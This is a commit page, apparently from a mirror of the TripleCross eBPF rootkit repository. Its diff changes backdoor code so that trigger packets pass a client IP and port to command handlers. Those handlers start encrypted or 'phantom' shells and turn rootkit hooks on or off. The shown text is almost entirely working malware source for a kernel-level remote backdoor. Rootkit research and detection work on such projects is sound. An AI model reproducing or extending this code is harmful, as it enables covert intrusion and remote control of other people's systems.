admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 19:03:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Fixed phantom shell, added ips for all types of backdoor triggers so that we can use different interfaces

Browse Source
This commit is contained in:
h3xduck
2022-05-15 16:45:47 -04:00
parent e6cbe7c24a
commit ce3b267d01
10 changed files with 3442 additions and 3434 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
src/ebpf/include/data/ring_buffer.h
View File

@@ -49,7 +49,7 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
*
* @return 0 if ok, -1 if error
*/
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code, __u32 ip, __u16 port){
struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
if(!event){
return -1;
@@ -58,6 +58,8 @@ static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer
event->code = code;
event->event_type = COMMAND;
event->pid = pid;
event->client_ip = ip;
event->client_port = port;
bpf_ringbuf_submit(event, 0);
return 0;

22
src/ebpf/include/xdp/backdoor.h
View File

@@ -15,15 +15,15 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
switch(command_received){
case CC_PROT_COMMAND_ENCRYPTED_SHELL:
bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break;
case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
bpf_printk("Received request to activate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break;
case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
bpf_printk("Received request to deactivate all hooks\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received, ip, port);
break;
case CC_PROT_COMMAND_PHANTOM_SHELL:
bpf_printk("Received request to start phantom shell\n");
@@ -301,8 +301,14 @@ backdoor_finish_v3_32:
bpf_printk("FAIL CHECK 3\n");
return 0;
}
__u32 ip;
__u16 port;
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
bpf_printk("Completed backdoor trigger v3 (32bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0, NULL, 0);
execute_key_command(command_received, ip, port, NULL, 0);
return 1;
}
@@ -446,8 +452,14 @@ backdoor_finish_v3_16:
bpf_printk("FAIL CHECK 3\n");
return 0;
}
__u32 ip;
__u16 port;
__builtin_memcpy(&ip, payload+0x01, sizeof(__u32));
__builtin_memcpy(&port, payload+0x05, sizeof(__u16));
bpf_printk("Completed backdoor trigger v3 (16bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0, NULL, 0);
execute_key_command(command_received, ip, port, NULL, 0);
return 1;
}